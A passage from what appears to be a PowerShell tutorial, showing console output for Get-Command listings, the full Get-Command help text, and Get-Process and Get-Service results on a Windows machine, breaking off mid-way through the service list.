[-Path] [-FileFormat [[-Delimiter] ...\nCmdlet Export-FormatData Export-FormatData [-InputObject ] [-C...\nCmdlet Export-PSSession Export-PSSession [-Session] [-Output...\nCmdlet ForEach-Object ForEach-Object [-Process] [-Inpu...\nCmdlet Format-Custom Format-Custom [[-Property] ] [-Depth <...\nCmdlet Format-List Format-List [[-Property] ] [-GroupBy <...\nCmdlet Format-Table Format-Table [[-Property] ] [-AutoSize...\nCmdlet Format-Wide Format-Wide [[-Property] ] [-AutoSize] [...\nCmdlet Get-Acl Get-Acl [[-Path] ] [-Audit] [-Filter <...\nCmdlet Get-Alias Get-Alias [[-Name] ] [-Exclude ...\nCmdlet Get-ChildItem Get-ChildItem [[-Path] ] [[-Filter] ] [-Verb ...\nCmdlet Get-ComputerRestorePoint Get-ComputerRestorePoint [[-RestorePoint] [-ReadCount ] [-SampleInte...\nCmdlet Get-Credential Get-Credential [-Credential] [-Ve...\nCmdlet Get-Culture Get-Culture [-Verbose] [-Debug] [-ErrorAction ] [-Year ] [-...\nCmdlet Get-Event Get-Event [[-SourceIdentifier] ] [-Verbo...\nCmdlet Get-EventLog Get-EventLog [-LogName] [[-InstanceId] ...\nCmdlet Get-EventSubscriber Get-EventSubscriber [[-SourceIdentifier] ] [-Verbos...\nCmdlet Get-Help Get-Help [[-Name] ] [-Path ] [-C...\nCmdlet Get-History Get-History [[-Id] ] [[-Count] ]...\nCmdlet Get-Host Get-Host [-Verbose] [-Debug] [-ErrorAction ] [-ComputerName [-Filter ] [...\nCmdlet Get-ItemProperty Get-ItemProperty [-Path] [[-Name] ] [-Verbose] [-Debug] [-...\nCmdlet Get-Location Get-Location [-PSProvider ] [-PSDrive ...\nCmdlet Get-Member Get-Member [[-Name] ] [-InputObject ] [-All] [-Verbose...\nCmdlet Get-PfxCertificate Get-PfxCertificate [-FilePath] [-Verb...\nCmdlet Get-Process Get-Process [[-Name] ] [-ComputerName ...\nCmdlet Get-PSBreakpoint Get-PSBreakpoint [[-Script] ] [-Verbos...\nCmdlet Get-PSCallStack Get-PSCallStack [-Verbose] [-Debug] [-ErrorActio...\nCmdlet Get-PSDrive Get-PSDrive [[-Name] ] [-Scope ] [-Verb...\nCmdlet Get-PSSession Get-PSSession [[-ComputerName] ] [-Ver...\nCmdlet Get-PSSessionConfiguration Get-PSSessionConfiguration [[-Name] ] ...\nCmdlet Get-PSSnapin Get-PSSnapin [[-Name] ] [-Registered] ...\nCmdlet Get-Random Get-Random [[-Maximum] ] [-SetSeed ] [-ComputerName ...\nCmdlet Get-TraceSource Get-TraceSource [[-Name] ] [-Verbose] ...\nCmdlet Get-Transaction Get-Transaction [-Verbose] [-Debug] [-ErrorActio...\nCmdlet Get-UICulture Get-UICulture [-Verbose] [-Debug] [-ErrorAction ...\nCmdlet Get-Unique Get-Unique [-InputObject ] [-AsString]...\nCmdlet Get-Variable Get-Variable [[-Name] ] [-ValueOnly] [...\nCmdlet Get-WinEvent Get-WinEvent [[-LogName] ] [-MaxEvents...\nCmdlet Get-WmiObject Get-WmiObject [-Class] [[-Property] [-Applica...\nCmdlet Group-Object Group-Object [[-Property] ] [-NoElemen...\nCmdlet Import-Alias Import-Alias [-Path] [-Scope ] ...\nCmdlet Import-Clixml Import-Clixml [-Path] [-Verbose] [-De...\nCmdlet Import-Counter Import-Counter [-Path] [-StartTime [[-Delimiter] ...\nCmdlet Import-Module Import-Module [-Name] [-Global] [-Pre...\nCmdlet Import-PSSession Import-PSSession [-Session] [[-Comma...\nCmdlet Invoke-Command Invoke-Command [-ScriptBlock] [-In...\nCmdlet Invoke-Expression Invoke-Expression [-Command] [-Verbose]...\nCmdlet Invoke-History Invoke-History [[-Id] ] [-Verbose] [-Deb...\nCmdlet Invoke-Item Invoke-Item [-Path] [-Filter ...\nCmdlet Invoke-WmiMethod Invoke-WmiMethod [-Class] [-Name] [-Action...\nCmdlet Join-Path Join-Path [-Path] [-ChildPath] [-ComputerN...\nCmdlet Measure-Command Measure-Command [-Expression] [-In...\nCmdlet Measure-Object Measure-Object [[-Property] ] [-InputO...\nCmdlet Move-Item Move-Item [-Path] [[-Destination] [-Destinati...\nCmdlet New-Alias New-Alias [-Name] [-Value] [-D...\nCmdlet New-Event New-Event [-SourceIdentifier] [[-Sender...\nCmdlet New-EventLog New-EventLog [-LogName] [-Source] [-ItemType ]...\nCmdlet New-ItemProperty New-ItemProperty [-Path] [-Name] [-Functi...\nCmdlet New-ModuleManifest New-ModuleManifest [-Path] -NestedModul...\nCmdlet New-Object New-Object [-TypeName] [[-ArgumentList]...\nCmdlet New-PSDrive New-PSDrive [-Name] [-PSProvider] ] [-Cre...\nCmdlet New-PSSessionOption New-PSSessionOption [-MaximumRedirection ...\nCmdlet New-Service New-Service [-Name] [-BinaryPathName] <...\nCmdlet New-TimeSpan New-TimeSpan [[-Start] ] [[-End] [[-Value] ...\nCmdlet New-WebServiceProxy New-WebServiceProxy [-Uri] [[-Class] [-Selecto...\nCmdlet New-WSManSessionOption New-WSManSessionOption [-ProxyAccessType ] [-Verbose]...\nCmdlet Out-File Out-File [-FilePath] [[-Encoding] ] [-Title <...\nCmdlet Out-Host Out-Host [-Paging] [-InputObject ] [-V...\nCmdlet Out-Null Out-Null [-InputObject ] [-Verbose] [-...\nCmdlet Out-Printer Out-Printer [[-Name] ] [-InputObject ] [-InputObj...\nCmdlet Pop-Location Pop-Location [-PassThru] [-StackName ] [...\nCmdlet Push-Location Push-Location [[-Path] ] [-PassThru] [-S...\nCmdlet Read-Host Read-Host [[-Prompt] ] [-AsSecureString]...\nCmdlet Receive-Job Receive-Job [-Job] [[-Location] [...\nCmdlet Register-PSSessionConfiguration Register-PSSessionConfiguration [-Name] ...\nCmdlet Register-WmiEvent Register-WmiEvent [-Class] [[-SourceIde...\nCmdlet Remove-Computer Remove-Computer [[-Credential] ] [...\nCmdlet Remove-Event Remove-Event [-SourceIdentifier] [-Verb...\nCmdlet Remove-EventLog Remove-EventLog [-LogName] [[-Compute...\nCmdlet Remove-Item Remove-Item [-Path] [-Filter ...\nCmdlet Remove-ItemProperty Remove-ItemProperty [-Path] [-Name] <...\nCmdlet Remove-Job Remove-Job [-Id] [-Force] [-Verbose] [...\nCmdlet Remove-Module Remove-Module [-Name] [-Force] [-Verb...\nCmdlet Remove-PSBreakpoint Remove-PSBreakpoint [-Breakpoint] ...\nCmdlet Remove-PSDrive Remove-PSDrive [-Name] [-PSProvider <...\nCmdlet Remove-PSSession Remove-PSSession [-Id] [-Verbose] [-De...\nCmdlet Remove-PSSnapin Remove-PSSnapin [-Name] [-PassThru] [...\nCmdlet Remove-Variable Remove-Variable [-Name] [-Include [-AsJob] [-Im...\nCmdlet Remove-WSManInstance Remove-WSManInstance [-ResourceURI] [-Sele...\nCmdlet Rename-Item Rename-Item [-Path] [-NewName] ...\nCmdlet Rename-ItemProperty Rename-ItemProperty [-Path] [-Name] ]...\nCmdlet Resolve-Path Resolve-Path [-Path] [-Relative] [-Cr...\nCmdlet Restart-Computer Restart-Computer [[-ComputerName] ] [[...\nCmdlet Restart-Service Restart-Service [-Name] [-Force] [-Pa...\nCmdlet Restore-Computer Restore-Computer [-RestorePoint] [-Verbo...\nCmdlet Resume-Service Resume-Service [-Name] [-PassThru] [-...\nCmdlet Select-Object Select-Object [[-Property] ] [-InputOb...\nCmdlet Select-String Select-String [-Pattern] -InputObject...\nCmdlet Select-Xml Select-Xml [-XPath] [-Xml] ...\nCmdlet Send-MailMessage Send-MailMessage [-To] [-Subject] [-AclObject] [-Value] [-D...\nCmdlet Set-AuthenticodeSignature Set-AuthenticodeSignature [-FilePath] ...\nCmdlet Set-Content Set-Content [-Path] [-Value] [-DisplayHint [[-Value] ] ...\nCmdlet Set-ItemProperty Set-ItemProperty [-Path] [-Name] ] [-PassThru] [-Ve...\nCmdlet Set-PSBreakpoint Set-PSBreakpoint [-Script] [-Line] ] [-Step] [-Strict] [...\nCmdlet Set-PSSessionConfiguration Set-PSSessionConfiguration [-Name] [-Ap...\nCmdlet Set-Service Set-Service [-Name] [-ComputerName [-Verbose] [-D...\nCmdlet Set-TraceSource Set-TraceSource [-Name] [[-Option] [[-Value] [[-Arguments] ...\nCmdlet Set-WSManInstance Set-WSManInstance [-ResourceURI] [[-Select...\nCmdlet Set-WSManQuickConfig Set-WSManQuickConfig [-UseSSL] [-Force] [-Verbos...\nCmdlet Show-EventLog Show-EventLog [[-ComputerName] ] [-Verbo...\nCmdlet Sort-Object Sort-Object [[-Property] ] [-Descendin...\nCmdlet Split-Path Split-Path [-Path] [-LiteralPath [[-Initia...\nCmdlet Start-Process Start-Process [-FilePath] [[-ArgumentLi...\nCmdlet Start-Service Start-Service [-Name] [-PassThru] [-I...\nCmdlet Start-Sleep Start-Sleep [-Seconds] [-Verbose] [-Debu...\nCmdlet Start-Transaction Start-Transaction [-Timeout ] [-Independe...\nCmdlet Start-Transcript Start-Transcript [[-Path] ] [-Append] [-...\nCmdlet Stop-Computer Stop-Computer [[-ComputerName] ] [[-Cr...\nCmdlet Stop-Job Stop-Job [-Id] [-PassThru] [-Verbose] ...\nCmdlet Stop-Process Stop-Process [-Id] [-PassThru] [-Force...\nCmdlet Stop-Service Stop-Service [-Name] [-Force] [-PassT...\nCmdlet Stop-Transcript Stop-Transcript [-Verbose] [-Debug] [-ErrorActio...\nCmdlet Suspend-Service Suspend-Service [-Name] [-PassThru] [...\nCmdlet Tee-Object Tee-Object [-FilePath] [-InputObject [[-So...\nCmdlet Test-ModuleManifest Test-ModuleManifest [-Path] [-Verbose] ...\nCmdlet Test-Path Test-Path [-Path] [-Filter ] ...\nCmdlet Test-WSMan Test-WSMan [[-ComputerName] ] [-Authenti...\nCmdlet Trace-Command Trace-Command [-Name] [-Expression] <...\nCmdlet Undo-Transaction Undo-Transaction [-Verbose] [-Debug] [-ErrorActi...\nCmdlet Unregister-Event Unregister-Event [-SourceIdentifier] [-...\nCmdlet Unregister-PSSessionConfiguration Unregister-PSSessionConfiguration [-Name] ] [-P...\nCmdlet Update-List Update-List [[-Property] ] [-Add ] [-Pre...\nCmdlet Use-Transaction Use-Transaction [-TransactedScript] ] [-Time...\nCmdlet Wait-Job Wait-Job [-Id] [-Any] [-Timeout [[-Timeout] [-Inp...\nCmdlet Write-Debug Write-Debug [-Message] [-Verbose] [-Deb...\nCmdlet Write-Error Write-Error [-Message] [-Category [-Source] ] [-NoNewline] [-S...\nCmdlet Write-Output Write-Output [-InputObject] [-Verbo...\nCmdlet Write-Progress Write-Progress [-Activity] [-Status] [-Verbose] [-D...\nCmdlet Write-Warning Write-Warning [-Message] [-Verbose] [-D...\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Print full help```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help Get-Command -full\n\nNAME\n Get-Command\n\nSYNOPSIS\n Gets basic information about cmdlets and other elements of Windows PowerShell commands.\n\nSYNTAX\n Get-Command [[-Name] ] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application |\n Script | All}] [[-ArgumentList] ] [-Module ] [-Syntax] [-TotalCount ] [\n ]\n\n Get-Command [-Noun ] [-Verb ] [[-ArgumentList] ] [-Module ] [-Syntax] [-Tot\n alCount ] []\n\n\nDESCRIPTION\n The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th\n e session, such as aliases, functions, filters, scripts, and applications.\n\n Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge\n ts its information from help topic files.\n\n Without parameters, \"Get-Command\" gets all of the cmdlets and functions in the current session. \"Get-Command *\" get\n s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en\n v:path). It groups the files in the \"Application\" command type.\n\n You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win\n dows PowerShell snap-in or importing a module.\n\n\nPARAMETERS\n -ArgumentList \n Gets information about a cmdlet or function when it is used with the specified parameters (\"arguments\"), such\n as a path. The alias for ArgumentList is Args.\n\n To detect parameters that are added to a cmdlet when it is used with a particular provider, set the value of Ar\n gumentList to a path in the provider drive, such as \"HKML\\Software\" or \"cert:\\my\".\n\n Required? false\n Position? 2\n Default value\n Accept pipeline input? false\n Accept wildcard characters? false\n\n -CommandType \n Gets only the specified types of commands. Use \"CommandType\" or its alias, \"Type\". By default, Get-Command gets\n cmdlets and functions.\n\n Valid values are:\n -- Alias: All Windows PowerShell aliases in the current session.\n\n -- All: All command types. It is the equivalent of \"get-command *\".\n\n -- Application: All non-Windows-PowerShell files in paths listed in the Path environment variable ($env:path),\n including .txt, .exe, and .dll files.\n\n -- Cmdlet: The cmdlets in the current session. \"Cmdlet\" is the default.\n\n -- ExternalScript: All .ps1 files in the paths listed in the Path environment variable ($env:path).\n\n -- Filter and Function: All Windows PowerShell functions.\n\n -- Script: Script blocks in the current session.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n -Module \n Gets the commands that came from the specified modules or snap-ins. Enter the names of modules or snap-ins, or\n enter snap-in or module objects.\n\n You can refer to this parameter by its name, Module, or by its alias, PSSnapin. The parameter name that you cho\n ose has no effect on the command or its output.\n\n This parameter takes string values, but you can also supply a PSModuleInfo or PSSnapinInfo object, such as the\n objects that Get-Module, Get-PSSnapin, and Import-PSSession return.\n\n Required? false\n Position? named\n Default value None\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n -Name \n Gets information only about the cmdlets or command elements with the specified name. represents all or\n part of the name of the cmdlet or command element. Wildcards are permitted.\n\n To list commands with the same name in execution order, type the command name without wildcard characters. For\n more information, see the Notes section.\n\n Required? false\n Position? 1\n Default value\n Accept pipeline input? true (ByValue, ByPropertyName)\n Accept wildcard characters? false\n\n -Noun \n Gets cmdlets and functions with names that include the specified noun. represents one or more nouns or\n noun patterns, such as \"process\" or \"*item*\". Wildcards are permitted.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n -Syntax []\n Gets only specified data about the command element.\n * For aliases, retrieves the standard name.\n * For cmdlets, retrieves the syntax.\n * For functions and filters, retrieves the function definition.\n * For scripts and applications (files), retrieves the path and filename.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n -TotalCount \n Gets only the specified number of command elements. You can use this parameter to limit the output of a command\n .\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n -Verb \n Gets information about cmdlets and functions with names that include the specified verb. represents on\n e or more verbs or verb patterns, such as \"remove\" or *et\". Wildcards are permitted.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n \n This cmdlet supports the common parameters: Verbose, Debug,\n ErrorAction, ErrorVariable, WarningAction, WarningVariable,\n OutBuffer and OutVariable. For more information, type,\n \"get-help about_commonparameters\".\n\nINPUTS\n System.String\n You can pipe a \"Name\", \"Command\", and \"Verb\" noun-property specified, or a string object to Get-Command.\n\n\nOUTPUTS\n Object\n The type of object returned depends on the type of command element retrieved. For example, Get-Command on a cmd\n let retrieves a CmdletInfo object, while Get-Command on a DLL retrieves an ApplicationInfo object.\n\n\nNOTES\n\n\n Without parameters, \"Get-Command\" gets information about the Windows PowerShell cmdlets and functions. Use the\n parameters to qualify the elements retrieved.\n\n Unlike Get-Help, which displays the contents of XML-based help topic files, Get-Command gets its cmdlet informa\n tion directly from the cmdlet code in the system.\n\n Get-Command returns the commands in alphabetical order. When the session contains more than one command with th\n e same name, Get-Command returns the commands in execution order. The first command that is listed is the comm\n and that runs when you type the command name without qualification. For more information, see about_Command_Pre\n cedence.\n\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>get-command\n\n\n Description\n -----------\n This command gets information about all of the Windows PowerShell cmdlets and functions.\n\n The default display lists the command type (\"Cmdlet\" or \"Function\" or \"Filter\"), the name of the cmdlet or function\n , and the syntax or function definition.\n\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n C:\\PS>get-command -verb set | format-list\n\n\n Description\n -----------\n This command gets information about all of the cmdlets and functions with the verb \"set\", and it displays some of t\n hat information in a list.\n\n The list format includes fields that are omitted from the table display, including the complete syntax. To display\n all fields (all properties of the object), type \"get-command -verb set | format-list *\".\n\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n C:\\PS>get-command -type cmdlet | sort-object noun | format-table -group noun\n\n\n Description\n -----------\n This command retrieves all of the cmdlets, sorts them alphabetically by the noun in the cmdlet name, and then displ\n ays them in noun-based\n groups. This display can help you find the cmdlets for a task.\n\n By default, Get-Command displays items in the order in which the system discovers them, which is also the order in\n which they are selected to run when a run command is ambiguous.\n\n\n\n\n\n -------------------------- EXAMPLE 4 --------------------------\n\n C:\\PS>get-command -module Microsoft.PowerShell.Security, TestModule\n\n\n Description\n -----------\n This command gets the commands in the Microsoft.PowerShell.Security snap-in and the Test-Module module.\n\n The Module parameter gets commands that were added by importing modules or adding Windows PowerShell snap-ins.\n\n\n\n\n\n -------------------------- EXAMPLE 5 --------------------------\n\n C:\\PS>get-command get-childitem -args cert: -syntax\n\n\n Description\n -----------\n This command retrieves information about the Get-ChildItem cmdlet when Get-ChildItem is used with the Windows Power\n Shell Certificate provider.\n\n When you compare the syntax displayed in the output with the syntax that is displayed when you omit the Args (Argum\n entList) parameter, you'll see that the Certificate provider dynamically adds a parameter, CodeSigningCert, to the\n Get-ChildItem cmdlet.\n\n\n\n\n\n -------------------------- EXAMPLE 6 --------------------------\n\n C:\\PS>(get-command get-childitem -ArgumentList cert:).parametersets[0].parameters | where-object { $_.IsDynamic }\n\n\n Description\n -----------\n This command retrieves only parameters that are added to the Get-ChildItem cmdlet dynamically when it is used with\n the Windows PowerShell Certificate provider. This is an alternative to the method used in the previous example.\n\n In this command, the \"get-command get-childitem -ArgumentList cert:\" is processed first. It requests information fr\n om Get-Command about the Get-ChildItem cmdlet when it is used with the Certificate provider. The \".parametersets[0]\n \" selects the first parameter set (set 0) of \"get-childitem -argumentList cert:\" and \".parameters\" selects the para\n meters in that parameter set. The resulting parameters are piped to the Where-Object cmdlet to test each parameter\n (\"$_.\") by using the IsDynamic property. To find the properties of the objects in a command, use Get-Member.\n\n\n\n\n\n -------------------------- EXAMPLE 7 --------------------------\n\n C:\\PS>get-command *\n\n\n Description\n -----------\n This command gets information about the Windows PowerShell cmdlets, functions, filters, scripts, and aliases in the\n current console.\n\n It also gets information about all of the files in the paths of the Path environment variable ($env:path). It retur\n ns an ApplicationInfo object (System.Management.Automation.ApplicationInfo) for each file, not a FileInfo object (S\n ystem.IO.FileInfo).\n\n\n\n\n\n -------------------------- EXAMPLE 8 --------------------------\n\n C:\\PS>get-command | where-object {$_.definition -like \"*first*\"}\n\n CommandType Name Definition\n ----------- ---- ---------\n Cmdlet Select-Object Select-Object [[-Property]\n\n\n Description\n -----------\n This command finds a cmdlet or function based on the name of one of its parameters. You can use this command to ide\n ntify a cmdlet or function when all that you can recall is the name of one of its parameters.\n\n In this case, you recall that one of the cmdlets or functions has a First parameter that gets the first \"n\" objects\n in a list, but you cannot remember which cmdlet it is.\n\n This command uses the Get-Command cmdlet to get a CmdletInfo object representing each of the cmdlets and functions\n in the session. The CmdletInfo object has a Definition property that contains the syntax of the cmdlet or function,\n which includes its parameters.\n\n The command uses a pipeline operator (|) to pass the CmdletInfo object to the Where-Object cmdlet, which examines t\n he definition (syntax) of each object ($_) for a value that includes \"first\".\n\n The result shows that the First parameter belongs to the Select-Object cmdlet.\n\n\n\n\n\n -------------------------- EXAMPLE 9 --------------------------\n\n C:\\PS>get-command dir | format-list\n\n Name : dir\n CommandType : Alias\n Definition : Get-ChildItem\n ReferencedCommand : Get-ChildItem\n ResolvedCommand : Get-ChildItem\n\n\n Description\n -----------\n This example shows how to use the Get-Command cmdlet with an alias. Although it is typically used on cmdlets, Get-C\n ommand also displays information about the code in scripts, functions, aliases, and executable files.\n\n This command displays the \"dir\" alias in the current console. The command pipes the result to the Format-List cmdle\n ts.\n\n\n\n\n\n -------------------------- EXAMPLE 10 --------------------------\n\n C:\\PS>get-command notepad\n\n CommandType Name Definition\n ----------- ---- ----------\n Application notepad.exe C:\\WINDOWS\\system32\\notepad.exe\n Application NOTEPAD.EXE C:\\WINDOWS\\NOTEPAD.EXE\n\n\n Description\n -----------\n This example shows how to use Get-Command to determine which command Windows PowerShell runs when it has access to\n multiple commands with the same name. When you use the Name parameter without wildcard characters, Get-Command list\n s the commands with that name in execution precedence order.\n\n This command shows which Notepad program Windows PowerShell runs when you type \"Notepad\" without a fully qualified\n path. The command uses the Name parameter without wildcard characters.\n\n The sample output shows the Notepad commands in the current console. It indicates that Windows PowerShell will run\n the instance of Notepad.exe in the C:\\Windows\\System32 directory.\n\n\n\n\n\n -------------------------- EXAMPLE 11 --------------------------\n\n C:\\PS>(get-command get-date).pssnapin\n\n C:\\PS> (get-command remove-gpo).module\n\n\n Description\n -----------\n These commands show how to find the snap-in or module from which a particular cmdlet originated.\n\n The first command uses the PSSnapin property of the CmdletInfo object to find the snap-in that added the Get-Date c\n mdlet.\n\n The second command uses the Module property of the CmdletInfo object to find the module that added the Remove-GPO c\n mdlet.\n\n\n\n\n\n\nRELATED LINKS\n Online version: http://go.microsoft.com/fwlink/?LinkID=113309\n about_Command_Precedence\n Get-Help\n Get-PSDrive\n Get-Member\n Import-PSSession\n Export-PSSession\n\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- List all parameters of ```Get-Command```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help Get-Command -Parameter *\n\n-ArgumentList \n Gets information about a cmdlet or function when it is used with the specified parameters (\"arguments\"), such as a\n path. The alias for ArgumentList is Args.\n\n To detect parameters that are added to a cmdlet when it is used with a particular provider, set the value of Argume\n ntList to a path in the provider drive, such as \"HKML\\Software\" or \"cert:\\my\".\n\n Required? false\n Position? 2\n Default value\n Accept pipeline input? false\n Accept wildcard characters? false\n\n\n-CommandType \n Gets only the specified types of commands. Use \"CommandType\" or its alias, \"Type\". By default, Get-Command gets cmd\n lets and functions.\n\n Valid values are:\n -- Alias: All Windows PowerShell aliases in the current session.\n\n -- All: All command types. It is the equivalent of \"get-command *\".\n\n -- Application: All non-Windows-PowerShell files in paths listed in the Path environment variable ($env:path), incl\n uding .txt, .exe, and .dll files.\n\n -- Cmdlet: The cmdlets in the current session. \"Cmdlet\" is the default.\n\n -- ExternalScript: All .ps1 files in the paths listed in the Path environment variable ($env:path).\n\n -- Filter and Function: All Windows PowerShell functions.\n\n -- Script: Script blocks in the current session.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n\n-Module \n Gets the commands that came from the specified modules or snap-ins. Enter the names of modules or snap-ins, or ente\n r snap-in or module objects.\n\n You can refer to this parameter by its name, Module, or by its alias, PSSnapin. The parameter name that you choose\n has no effect on the command or its output.\n\n This parameter takes string values, but you can also supply a PSModuleInfo or PSSnapinInfo object, such as the obje\n cts that Get-Module, Get-PSSnapin, and Import-PSSession return.\n\n Required? false\n Position? named\n Default value None\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n\n-Name \n Gets information only about the cmdlets or command elements with the specified name. represents all or par\n t of the name of the cmdlet or command element. Wildcards are permitted.\n\n To list commands with the same name in execution order, type the command name without wildcard characters. For more\n information, see the Notes section.\n\n Required? false\n Position? 1\n Default value\n Accept pipeline input? true (ByValue, ByPropertyName)\n Accept wildcard characters? false\n\n\n-Noun \n Gets cmdlets and functions with names that include the specified noun. represents one or more nouns or nou\n n patterns, such as \"process\" or \"*item*\". Wildcards are permitted.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n\n-Syntax []\n Gets only specified data about the command element.\n * For aliases, retrieves the standard name.\n * For cmdlets, retrieves the syntax.\n * For functions and filters, retrieves the function definition.\n * For scripts and applications (files), retrieves the path and filename.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n\n-TotalCount \n Gets only the specified number of command elements. You can use this parameter to limit the output of a command.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n\n-Verb \n Gets information about cmdlets and functions with names that include the specified verb. represents one or\n more verbs or verb patterns, such as \"remove\" or *et\". Wildcards are permitted.\n\n Required? false\n Position? named\n Default value\n Accept pipeline input? true (ByPropertyName)\n Accept wildcard characters? false\n\n\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- List all ```Cmdlet``` of ```Get-Command``` with name ```process```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Command -CommandType cmdlet -Name *process*\n\nCommandType Name Definition\n----------- ---- ----------\nCmdlet Debug-Process Debug-Process [-Name] [-Verbose] [-De...\nCmdlet Get-Process Get-Process [[-Name] ] [-ComputerName ...\nCmdlet Start-Process Start-Process [-FilePath] [[-ArgumentLi...\nCmdlet Stop-Process Stop-Process [-Id] [-PassThru] [-Force...\nCmdlet Wait-Process Wait-Process [-Name] [[-Timeout] \n```\n\n- List all ```Cmdlet``` of ```Get-Command``` with name ```service```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Command -CommandType cmdlet -Name *service*\n\nCommandType Name\n----------- ----\nCmdlet Get-Service\nCmdlet New-Service\nCmdlet New-WebServiceProxy\nCmdlet Restart-Service\nCmdlet Resume-Service\nCmdlet Set-Service\nCmdlet Start-Service\nCmdlet Stop-Service\nCmdlet Suspend-Service\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- Count ```Cmdlet``` of ```Get-Command```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Command -CommandType cmdlet | Measure-Object\n\n\nCount : 236\nAverage :\nSum :\nMaximum :\nMinimum :\nProperty :\n\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Process Listing```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Process\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 23 2 1752 1608 27 0.01 2864 cmd\n 91 4 196908 201960 250 2.94 2444 conhost\n 53 3 872 3536 43 0.04 2872 conhost\n 379 5 1092 2192 30 352 csrss\n 206 6 1104 3360 31 396 csrss\n 69 3 972 2732 36 0.02 324 dwm\n 716 23 22560 23892 181 1.64 740 explorer\n 0 0 0 12 0 0 Idle\n 60 3 2024 3180 51 0.01 2020 jusched\n 723 12 2928 5880 29 488 lsass\n 141 3 1020 2284 13 496 lsm\n 101 6 7772 9384 79 1.30 2716 notepad++\n 829 10 43692 39648 184 1.71 2432 powershell\n 134 5 6364 9644 60 0.18 3008 python\n 95 4 1392 3920 36 2608 SearchFilterHost\n 630 15 17092 10908 88 292 SearchIndexer\n 278 5 2080 5696 42 3440 SearchProtocolHost\n 194 7 4248 4536 29 480 services\n 29 1 212 564 4 264 smss\n 288 9 4368 5372 55 1328 spoolsv\n 347 7 2552 5104 31 600 svchost\n 250 8 2072 4080 23 712 svchost\n 543 13 13692 10848 74 764 svchost\n 508 12 25240 28872 92 884 svchost\n 1048 27 13140 19608 96 924 svchost\n 441 16 5452 7284 46 1128 svchost\n 379 13 7620 7488 51 1232 svchost\n 305 24 8600 6560 43 1364 svchost\n 349 15 5044 7136 63 1468 svchost\n 98 7 1184 3092 22 1828 svchost\n 349 13 8112 8236 59 2376 svchost\n 353 23 45640 14440 207 3488 svchost\n 539 0 48 868 2 4 System\n 185 9 6728 5232 45 0.04 328 taskhost\n 115 5 1400 3292 43 660 VBoxService\n 143 5 1308 3920 58 0.03 1116 VBoxTray\n 75 5 836 2676 29 384 wininit\n 113 4 1508 3308 35 436 winlogon\n 421 15 7788 7104 104 2092 wmpnetwk\n 91 4 1152 4632 53 0.01 3860 wuauclt\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Service Listing```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Service\n\nStatus Name DisplayName\n------ ---- -----------\nStopped AeLookupSvc Application Experience\nStopped ALG Application Layer Gateway Service\nStopped AppIDSvc Application Identity\nStopped Appinfo Application Information\nStopped AppMgmt Application Management\nRunning AudioEndpointBu... Windows Audio Endpoint Builder\nRunning Audiosrv Windows Audio\nStopped AxInstSV ActiveX Installer (AxInstSV)\nStopped BDESVC BitLocker Drive Encryption Service\nRunning BFE Base Filtering Engine\nStopped BITS Background Intelligent Transfer Ser...\nRunning Browser Computer Browser\nStopped bthserv Bluetooth Support Service\nStopped CertPropSvc Certificate Propagation\nStopped clr_optimizatio... Microsoft .NET Framework NGEN v2.0....\nStopped COMSysApp COM+ System Application\nRunning CryptSvc Cryptographic Services\nRunning CscService Offline Files\nRunning DcomLaunch DCOM Server Process Launcher\nStopped defragsvc Disk Defragmenter\nRunning Dhcp DHCP Client\nRunning Dnscache DNS Client\nStopped dot3svc Wired AutoConfig\nRunning DPS Diagnostic Policy Service\nStopped EapHost Extensible Authentication Protocol\nStopped EFS Encrypting File System (EFS)\nStopped ehRecvr Windows Media Center Receiver Service\nStopped ehSched Windows Media Center Scheduler Service\nRunning eventlog Windows Event Log\nRunning EventSystem COM+ Event System\nStopped Fax Fax\nRunning fdPHost Function Discovery Provider Host\nRunning FDResPub Function Discovery Resource Publica...\nStopped FontCache Windows Font Cache Service\nStopped FontCache3.0.0.0 Windows Presentation Foundation Fon...\nRunning gpsvc Group Policy Client\nStopped hidserv Human Interface Device Access\nStopped hkmsvc Health Key and Certificate Management\nRunning HomeGroupProvider HomeGroup Provider\nStopped idsvc Windows CardSpace\nRunning IKEEXT IKE and AuthIP IPsec Keying 